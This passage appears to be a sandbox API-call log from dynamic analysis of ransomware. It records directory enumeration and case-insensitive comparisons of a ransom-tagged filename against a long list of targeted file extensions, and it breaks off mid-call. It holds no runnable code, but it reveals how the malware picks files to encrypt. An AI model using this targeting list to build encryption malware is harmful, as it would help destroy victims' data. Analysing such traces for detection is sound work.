ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0178.044] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0178.044] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0178.044] lstrlenW (lpString="Logs") returned 4 [0178.044] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0178.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x3c60950 [0178.044] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0178.044] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a7f0 [0178.046] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.046] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xa7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DOWNLE~1.BAT")) returned 1 [0178.046] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat") returned 80 [0178.046] lstrlenW (lpString=".1cd") returned 4 [0178.046] lstrcmpiW (lpString1=".1cd", lpString2=".bat") returned -1 [0178.046] lstrlenW (lpString=".3ds") returned 4 [0178.046] lstrcmpiW (lpString1=".3ds", lpString2=".bat") returned -1 [0178.046] lstrlenW (lpString=".3fr") returned 4 [0178.046] lstrcmpiW (lpString1=".3fr", lpString2=".bat") returned -1 [0178.046] lstrlenW (lpString=".3g2") returned 4 [0178.046] lstrcmpiW (lpString1=".3g2", lpString2=".bat") returned -1 [0178.046] lstrlenW (lpString=".3gp") returned 4 [0178.046] lstrcmpiW (lpString1=".3gp", lpString2=".bat") returned -1 [0178.046] lstrlenW (lpString=".7z") returned 3 [0178.046] lstrcmpiW (lpString1=".7z", lpString2="bat") returned -1 [0178.047] lstrlenW (lpString=".accda") returned 6 [0178.047] lstrcmpiW (lpString1=".accda", lpString2="i].bat") returned -1 [0178.047] lstrlenW (lpString=".accdb") returned 6 [0178.047] lstrcmpiW (lpString1=".accdb", lpString2="i].bat") returned -1 [0178.047] lstrlenW (lpString=".accdc") returned 6 [0178.047] lstrcmpiW (lpString1=".accdc", lpString2="i].bat") returned -1 [0178.047] lstrlenW (lpString=".accde") returned 6 [0178.047] lstrcmpiW (lpString1=".accde", lpString2="i].bat") returned -1 [0178.047] lstrlenW (lpString=".accdt") returned 6 [0178.047] lstrcmpiW (lpString1=".accdt", lpString2="i].bat") returned -1 [0178.047] lstrlenW (lpString=".accdw") returned 6 [0178.047] lstrcmpiW (lpString1=".accdw", lpString2="i].bat") returned -1 [0178.047] lstrlenW (lpString=".adb") returned 4 [0178.047] lstrcmpiW (lpString1=".adb", lpString2=".bat") returned -1 [0178.047] lstrlenW (lpString=".adp") returned 4 [0178.047] lstrcmpiW (lpString1=".adp", lpString2=".bat") returned -1 [0178.047] lstrlenW (lpString=".ai") returned 3 [0178.047] lstrcmpiW (lpString1=".ai", lpString2="bat") returned -1 [0178.047] lstrlenW (lpString=".ai3") returned 4 [0178.047] lstrcmpiW (lpString1=".ai3", lpString2=".bat") returned -1 [0178.047] lstrlenW (lpString=".ai4") returned 4 [0178.047] lstrcmpiW (lpString1=".ai4", lpString2=".bat") returned -1 [0178.047] lstrlenW (lpString=".ai5") returned 4 [0178.047] lstrcmpiW (lpString1=".ai5", lpString2=".bat") returned -1 [0178.047] lstrlenW (lpString=".ai6") returned 4 [0178.047] lstrcmpiW (lpString1=".ai6", lpString2=".bat") returned -1 [0178.048] lstrlenW (lpString=".ai7") returned 4 [0178.048] lstrcmpiW (lpString1=".ai7", lpString2=".bat") returned -1 [0178.048] lstrlenW (lpString=".ai8") returned 4 [0178.048] lstrcmpiW (lpString1=".ai8", lpString2=".bat") returned -1 [0178.048] lstrlenW (lpString=".anim") returned 5 [0178.048] lstrcmpiW (lpString1=".anim", lpString2="].bat") returned -1 [0178.048] lstrlenW (lpString=".arw") returned 4 [0178.048] lstrcmpiW (lpString1=".arw", lpString2=".bat") returned -1 [0178.048] lstrlenW (lpString=".as") returned 3 [0178.048] lstrcmpiW (lpString1=".as", lpString2="bat") returned -1 [0178.048] lstrlenW (lpString=".asa") returned 4 [0178.048] lstrcmpiW (lpString1=".asa", lpString2=".bat") returned -1 [0178.048] lstrlenW (lpString=".asc") returned 4 [0178.048] lstrcmpiW (lpString1=".asc", lpString2=".bat") returned -1 [0178.048] lstrlenW (lpString=".ascx") returned 5 [0178.048] lstrcmpiW (lpString1=".ascx", lpString2="].bat") returned -1 [0178.048] lstrlenW (lpString=".asm") returned 4 [0178.048] lstrcmpiW (lpString1=".asm", lpString2=".bat") returned -1 [0178.048] lstrlenW (lpString=".asmx") returned 5 [0178.048] lstrcmpiW (lpString1=".asmx", lpString2="].bat") returned -1 [0178.048] lstrlenW (lpString=".asp") returned 4 [0178.048] lstrcmpiW (lpString1=".asp", lpString2=".bat") returned -1 [0178.049] lstrlenW (lpString=".aspx") returned 5 [0178.049] lstrcmpiW (lpString1=".aspx", lpString2="].bat") returned -1 [0178.049] lstrlenW (lpString=".asr") returned 4 [0178.049] lstrcmpiW (lpString1=".asr", lpString2=".bat") returned -1 [0178.049] lstrlenW (lpString=".asx") returned 4 [0178.049] lstrcmpiW (lpString1=".asx", lpString2=".bat") returned -1 [0178.049] lstrlenW (lpString=".avi") returned 4 [0178.049] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.049] lstrlenW (lpString=".avs") returned 4 [0178.049] lstrcmpiW (lpString1=".avs", lpString2=".bat") returned -1 [0178.049] lstrlenW (lpString=".backup") returned 7 [0178.049] lstrcmpiW (lpString1=".backup", lpString2="li].bat") returned -1 [0178.049] lstrlenW (lpString=".bak") returned 4 [0178.050] lstrcmpiW (lpString1=".bak", lpString2=".bat") returned -1 [0178.050] lstrlenW (lpString=".bay") returned 4 [0178.050] lstrcmpiW (lpString1=".bay", lpString2=".bat") returned 1 [0178.050] lstrlenW (lpString=".bd") returned 3 [0178.050] lstrcmpiW (lpString1=".bd", lpString2="bat") returned -1 [0178.050] lstrlenW (lpString=".bin") returned 4 [0178.050] lstrcmpiW (lpString1=".bin", lpString2=".bat") returned 1 [0178.050] lstrlenW (lpString=".bmp") returned 4 [0178.050] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0178.050] lstrlenW (lpString=".bz2") returned 4 [0178.050] lstrcmpiW (lpString1=".bz2", lpString2=".bat") returned 1 [0178.050] lstrlenW (lpString=".c") returned 2 [0178.050] lstrcmpiW (lpString1=".c", lpString2="at") returned -1 [0178.050] lstrlenW (lpString=".cdr") returned 4 [0178.050] lstrcmpiW (lpString1=".cdr", lpString2=".bat") returned 1 [0178.050] lstrlenW (lpString=".cer") returned 4 [0178.050] lstrcmpiW (lpString1=".cer", lpString2=".bat") returned 1 [0178.050] lstrlenW (lpString=".cf") returned 3 [0178.050] lstrcmpiW (lpString1=".cf", lpString2="bat") returned -1 [0178.050] lstrlenW (lpString=".cfc") returned 4 [0178.050] lstrcmpiW (lpString1=".cfc", lpString2=".bat") returned 1 [0178.050] lstrlenW (lpString=".cfm") returned 4 [0178.050] lstrcmpiW (lpString1=".cfm", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".cfml") returned 5 [0178.051] lstrcmpiW (lpString1=".cfml", lpString2="].bat") returned -1 [0178.051] lstrlenW (lpString=".cfu") returned 4 [0178.051] lstrcmpiW (lpString1=".cfu", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".chm") returned 4 [0178.051] lstrcmpiW (lpString1=".chm", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".cin") returned 4 [0178.051] lstrcmpiW (lpString1=".cin", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".class") returned 6 [0178.051] lstrcmpiW (lpString1=".class", lpString2="i].bat") returned -1 [0178.051] lstrlenW (lpString=".clx") returned 4 [0178.051] lstrcmpiW (lpString1=".clx", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".config") returned 7 [0178.051] lstrcmpiW (lpString1=".config", lpString2="li].bat") returned -1 [0178.051] lstrlenW (lpString=".cpp") returned 4 [0178.051] lstrcmpiW (lpString1=".cpp", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".cr2") returned 4 [0178.051] lstrcmpiW (lpString1=".cr2", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".crt") returned 4 [0178.051] lstrcmpiW (lpString1=".crt", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".crw") returned 4 [0178.051] lstrcmpiW (lpString1=".crw", lpString2=".bat") returned 1 [0178.051] lstrlenW (lpString=".cs") returned 3 [0178.052] lstrcmpiW (lpString1=".cs", lpString2="bat") returned -1 [0178.052] lstrlenW (lpString=".css") returned 4 [0178.052] lstrcmpiW (lpString1=".css", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".csv") returned 4 [0178.052] lstrcmpiW (lpString1=".csv", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".cub") returned 4 [0178.052] lstrcmpiW (lpString1=".cub", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".dae") returned 4 [0178.052] lstrcmpiW (lpString1=".dae", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".dat") returned 4 [0178.052] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".db") returned 3 [0178.052] lstrcmpiW (lpString1=".db", lpString2="bat") returned -1 [0178.052] lstrlenW (lpString=".dbf") returned 4 [0178.052] lstrcmpiW (lpString1=".dbf", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".dbx") returned 4 [0178.052] lstrcmpiW (lpString1=".dbx", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".dc3") returned 4 [0178.052] lstrcmpiW (lpString1=".dc3", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".dcm") returned 4 [0178.052] lstrcmpiW (lpString1=".dcm", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".dcr") returned 4 [0178.052] lstrcmpiW (lpString1=".dcr", lpString2=".bat") returned 1 [0178.052] lstrlenW (lpString=".der") returned 4 [0178.053] lstrcmpiW (lpString1=".der", lpString2=".bat") returned 1 [0178.053] lstrlenW (lpString=".dib") returned 4 [0178.053] lstrcmpiW (lpString1=".dib", lpString2=".bat") returned 1 [0178.053] lstrlenW (lpString=".dic") returned 4 [0178.053] lstrcmpiW (lpString1=".dic", lpString2=".bat") returned 1 [0178.053] lstrlenW (lpString=".dif") returned 4 [0178.053] lstrcmpiW (lpString1=".dif", lpString2=".bat") returned 1 [0178.053] lstrlenW (lpString=".divx") returned 5 [0178.053] lstrcmpiW (lpString1=".divx", lpString2="].bat") returned -1 [0178.053] lstrlenW (lpString=".djvu") returned 5 [0178.053] lstrcmpiW (lpString1=".djvu", lpString2="].bat") returned -1 [0178.053] lstrlenW (lpString=".dng") returned 4 [0178.053] lstrcmpiW (lpString1=".dng", lpString2=".bat") returned 1 [0178.053] lstrlenW (lpString=".doc") returned 4 [0178.053] lstrcmpiW (lpString1=".doc", lpString2=".bat") returned 1 [0178.053] lstrlenW (lpString=".docm") returned 5 [0178.053] lstrcmpiW (lpString1=".docm", lpString2="].bat") returned -1 [0178.053] lstrlenW (lpString=".docx") returned 5 [0178.053] lstrcmpiW (lpString1=".docx", lpString2="].bat") returned -1 [0178.053] lstrlenW (lpString=".dot") returned 4 [0178.053] lstrcmpiW (lpString1=".dot", lpString2=".bat") returned 1 [0178.053] lstrlenW (lpString=".dotm") returned 5 [0178.053] lstrcmpiW (lpString1=".dotm", lpString2="].bat") returned -1 [0178.054] lstrlenW (lpString=".dotx") returned 5 [0178.054] lstrcmpiW (lpString1=".dotx", lpString2="].bat") returned -1 [0178.054] lstrlenW (lpString=".dpx") returned 4 [0178.054] lstrcmpiW (lpString1=".dpx", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".dqy") returned 4 [0178.054] lstrcmpiW (lpString1=".dqy", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".dsn") returned 4 [0178.054] lstrcmpiW (lpString1=".dsn", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".dt") returned 3 [0178.054] lstrcmpiW (lpString1=".dt", lpString2="bat") returned -1 [0178.054] lstrlenW (lpString=".dtd") returned 4 [0178.054] lstrcmpiW (lpString1=".dtd", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".dwg") returned 4 [0178.054] lstrcmpiW (lpString1=".dwg", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".dwt") returned 4 [0178.054] lstrcmpiW (lpString1=".dwt", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".dx") returned 3 [0178.054] lstrcmpiW (lpString1=".dx", lpString2="bat") returned -1 [0178.054] lstrlenW (lpString=".dxf") returned 4 [0178.054] lstrcmpiW (lpString1=".dxf", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".edml") returned 5 [0178.054] lstrcmpiW (lpString1=".edml", lpString2="].bat") returned -1 [0178.054] lstrlenW (lpString=".efd") returned 4 [0178.054] lstrcmpiW (lpString1=".efd", lpString2=".bat") returned 1 [0178.054] lstrlenW (lpString=".elf") returned 4 [0178.054] lstrcmpiW (lpString1=".elf", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".emf") returned 4 [0178.055] lstrcmpiW (lpString1=".emf", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".emz") returned 4 [0178.055] lstrcmpiW (lpString1=".emz", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".epf") returned 4 [0178.055] lstrcmpiW (lpString1=".epf", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".eps") returned 4 [0178.055] lstrcmpiW (lpString1=".eps", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".epsf") returned 5 [0178.055] lstrcmpiW (lpString1=".epsf", lpString2="].bat") returned -1 [0178.055] lstrlenW (lpString=".epsp") returned 5 [0178.055] lstrcmpiW (lpString1=".epsp", lpString2="].bat") returned -1 [0178.055] lstrlenW (lpString=".erf") returned 4 [0178.055] lstrcmpiW (lpString1=".erf", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".exr") returned 4 [0178.055] lstrcmpiW (lpString1=".exr", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".f4v") returned 4 [0178.055] lstrcmpiW (lpString1=".f4v", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".fido") returned 5 [0178.055] lstrcmpiW (lpString1=".fido", lpString2="].bat") returned -1 [0178.055] lstrlenW (lpString=".flm") returned 4 [0178.055] lstrcmpiW (lpString1=".flm", lpString2=".bat") returned 1 [0178.055] lstrlenW (lpString=".flv") returned 4 [0178.056] lstrcmpiW (lpString1=".flv", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".frm") returned 4 [0178.056] lstrcmpiW (lpString1=".frm", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".fxg") returned 4 [0178.056] lstrcmpiW (lpString1=".fxg", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".geo") returned 4 [0178.056] lstrcmpiW (lpString1=".geo", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".gif") returned 4 [0178.056] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".grs") returned 4 [0178.056] lstrcmpiW (lpString1=".grs", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".gz") returned 3 [0178.056] lstrcmpiW (lpString1=".gz", lpString2="bat") returned -1 [0178.056] lstrlenW (lpString=".h") returned 2 [0178.056] lstrcmpiW (lpString1=".h", lpString2="at") returned -1 [0178.056] lstrlenW (lpString=".hdr") returned 4 [0178.056] lstrcmpiW (lpString1=".hdr", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".hpp") returned 4 [0178.056] lstrcmpiW (lpString1=".hpp", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".hta") returned 4 [0178.056] lstrcmpiW (lpString1=".hta", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".htc") returned 4 [0178.056] lstrcmpiW (lpString1=".htc", lpString2=".bat") returned 1 [0178.056] lstrlenW (lpString=".htm") returned 4 [0178.057] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".html") returned 5 [0178.057] lstrcmpiW (lpString1=".html", lpString2="].bat") returned -1 [0178.057] lstrlenW (lpString=".icb") returned 4 [0178.057] lstrcmpiW (lpString1=".icb", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".ics") returned 4 [0178.057] lstrcmpiW (lpString1=".ics", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".iff") returned 4 [0178.057] lstrcmpiW (lpString1=".iff", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".inc") returned 4 [0178.057] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".indd") returned 5 [0178.057] lstrcmpiW (lpString1=".indd", lpString2="].bat") returned -1 [0178.057] lstrlenW (lpString=".ini") returned 4 [0178.057] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".iqy") returned 4 [0178.057] lstrcmpiW (lpString1=".iqy", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".j2c") returned 4 [0178.057] lstrcmpiW (lpString1=".j2c", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".j2k") returned 4 [0178.057] lstrcmpiW (lpString1=".j2k", lpString2=".bat") returned 1 [0178.057] lstrlenW (lpString=".java") returned 5 [0178.057] lstrcmpiW (lpString1=".java", lpString2="].bat") returned -1 [0178.058] lstrlenW (lpString=".jp2") returned 4 [0178.058] lstrcmpiW (lpString1=".jp2", lpString2=".bat") returned 1 [0178.058] lstrlenW (lpString=".jpc") returned 4 [0178.058] lstrcmpiW (lpString1=".jpc", lpString2=".bat") returned 1 [0178.058] lstrlenW (lpString=".jpe") returned 4 [0178.058] lstrcmpiW (lpString1=".jpe", lpString2=".bat") returned 1 [0178.058] lstrlenW (lpString=".jpeg") returned 5 [0178.058] lstrcmpiW (lpString1=".jpeg", lpString2="].bat") returned -1 [0178.058] lstrlenW (lpString=".jpf") returned 4 [0178.058] lstrcmpiW (lpString1=".jpf", lpString2=".bat") returned 1 [0178.058] lstrlenW (lpString=".jpg") returned 4 [0178.058] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0178.058] lstrlenW (lpString=".jpx") returned 4 [0178.058] lstrcmpiW (lpString1=".jpx", lpString2=".bat") returned 1 [0178.058] lstrlenW (lpString=".js") returned 3 [0178.058] lstrcmpiW (lpString1=".js", lpString2="bat") returned -1 [0178.058] lstrlenW (lpString=".jsf") returned 4 [0178.058] lstrcmpiW (lpString1=".jsf", lpString2=".bat") returned 1 [0178.058] lstrlenW (lpString=".json") returned 5 [0178.058] lstrcmpiW (lpString1=".json", lpString2="].bat") returned -1 [0178.058] lstrlenW (lpString=".jsp") returned 4 [0178.058] lstrcmpiW (lpString1=".jsp", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".kdc") returned 4 [0178.059] lstrcmpiW (lpString1=".kdc", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".kmz") returned 4 [0178.059] lstrcmpiW (lpString1=".kmz", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".kwm") returned 4 [0178.059] lstrcmpiW (lpString1=".kwm", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".lasso") returned 6 [0178.059] lstrcmpiW (lpString1=".lasso", lpString2="i].bat") returned -1 [0178.059] lstrlenW (lpString=".lbi") returned 4 [0178.059] lstrcmpiW (lpString1=".lbi", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".lgf") returned 4 [0178.059] lstrcmpiW (lpString1=".lgf", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".lgp") returned 4 [0178.059] lstrcmpiW (lpString1=".lgp", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".log") returned 4 [0178.059] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".m1v") returned 4 [0178.059] lstrcmpiW (lpString1=".m1v", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".m4a") returned 4 [0178.059] lstrcmpiW (lpString1=".m4a", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".m4v") returned 4 [0178.059] lstrcmpiW (lpString1=".m4v", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".max") returned 4 [0178.059] lstrcmpiW (lpString1=".max", lpString2=".bat") returned 1 [0178.059] lstrlenW (lpString=".md") returned 3 [0178.060] lstrcmpiW (lpString1=".md", lpString2="bat") returned -1 [0178.060] lstrlenW (lpString=".mda") returned 4 [0178.060] lstrcmpiW (lpString1=".mda", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mdb") returned 4 [0178.060] lstrcmpiW (lpString1=".mdb", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mde") returned 4 [0178.060] lstrcmpiW (lpString1=".mde", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mdf") returned 4 [0178.060] lstrcmpiW (lpString1=".mdf", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mdw") returned 4 [0178.060] lstrcmpiW (lpString1=".mdw", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mef") returned 4 [0178.060] lstrcmpiW (lpString1=".mef", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mft") returned 4 [0178.060] lstrcmpiW (lpString1=".mft", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mfw") returned 4 [0178.060] lstrcmpiW (lpString1=".mfw", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mht") returned 4 [0178.060] lstrcmpiW (lpString1=".mht", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mhtml") returned 6 [0178.060] lstrcmpiW (lpString1=".mhtml", lpString2="i].bat") returned -1 [0178.060] lstrlenW (lpString=".mka") returned 4 [0178.060] lstrcmpiW (lpString1=".mka", lpString2=".bat") returned 1 [0178.060] lstrlenW (lpString=".mkidx") returned 6 [0178.061] lstrcmpiW (lpString1=".mkidx", lpString2="i].bat") returned -1 [0178.061] lstrlenW (lpString=".mkv") returned 4 [0178.061] lstrcmpiW (lpString1=".mkv", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mos") returned 4 [0178.061] lstrcmpiW (lpString1=".mos", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mov") returned 4 [0178.061] lstrcmpiW (lpString1=".mov", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mp3") returned 4 [0178.061] lstrcmpiW (lpString1=".mp3", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mp4") returned 4 [0178.061] lstrcmpiW (lpString1=".mp4", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mpeg") returned 5 [0178.061] lstrcmpiW (lpString1=".mpeg", lpString2="].bat") returned -1 [0178.061] lstrlenW (lpString=".mpg") returned 4 [0178.061] lstrcmpiW (lpString1=".mpg", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mpv") returned 4 [0178.061] lstrcmpiW (lpString1=".mpv", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mrw") returned 4 [0178.061] lstrcmpiW (lpString1=".mrw", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".msg") returned 4 [0178.061] lstrcmpiW (lpString1=".msg", lpString2=".bat") returned 1 [0178.061] lstrlenW (lpString=".mxl") returned 4 [0178.061] lstrcmpiW (lpString1=".mxl", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".myd") returned 4 [0178.062] lstrcmpiW (lpString1=".myd", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".myi") returned 4 [0178.062] lstrcmpiW (lpString1=".myi", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".nef") returned 4 [0178.062] lstrcmpiW (lpString1=".nef", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".nrw") returned 4 [0178.062] lstrcmpiW (lpString1=".nrw", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".obj") returned 4 [0178.062] lstrcmpiW (lpString1=".obj", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".odb") returned 4 [0178.062] lstrcmpiW (lpString1=".odb", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".odc") returned 4 [0178.062] lstrcmpiW (lpString1=".odc", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".odm") returned 4 [0178.062] lstrcmpiW (lpString1=".odm", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".odp") returned 4 [0178.062] lstrcmpiW (lpString1=".odp", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".ods") returned 4 [0178.062] lstrcmpiW (lpString1=".ods", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".oft") returned 4 [0178.062] lstrcmpiW (lpString1=".oft", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".one") returned 4 [0178.062] lstrcmpiW (lpString1=".one", lpString2=".bat") returned 1 [0178.062] lstrlenW (lpString=".onepkg") returned 7 [0178.063] lstrcmpiW (lpString1=".onepkg", lpString2="li].bat") returned -1 [0178.063] lstrlenW (lpString=".onetoc2") returned 8 [0178.063] lstrcmpiW (lpString1=".onetoc2", lpString2=".li].bat") returned 1 [0178.063] lstrlenW (lpString=".opt") returned 4 [0178.063] lstrcmpiW (lpString1=".opt", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".oqy") returned 4 [0178.063] lstrcmpiW (lpString1=".oqy", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".orf") returned 4 [0178.063] lstrcmpiW (lpString1=".orf", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".p12") returned 4 [0178.063] lstrcmpiW (lpString1=".p12", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".p7b") returned 4 [0178.063] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".p7c") returned 4 [0178.063] lstrcmpiW (lpString1=".p7c", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".pam") returned 4 [0178.063] lstrcmpiW (lpString1=".pam", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".pbm") returned 4 [0178.063] lstrcmpiW (lpString1=".pbm", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".pct") returned 4 [0178.063] lstrcmpiW (lpString1=".pct", lpString2=".bat") returned 1 [0178.063] lstrlenW (lpString=".pcx") returned 4 [0178.064] lstrcmpiW (lpString1=".pcx", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pdd") returned 4 [0178.064] lstrcmpiW (lpString1=".pdd", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pdf") returned 4 [0178.064] lstrcmpiW (lpString1=".pdf", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pdp") returned 4 [0178.064] lstrcmpiW (lpString1=".pdp", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pef") returned 4 [0178.064] lstrcmpiW (lpString1=".pef", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pem") returned 4 [0178.064] lstrcmpiW (lpString1=".pem", lpString2=".bat") returned 1 [0178.064] lstrlenW 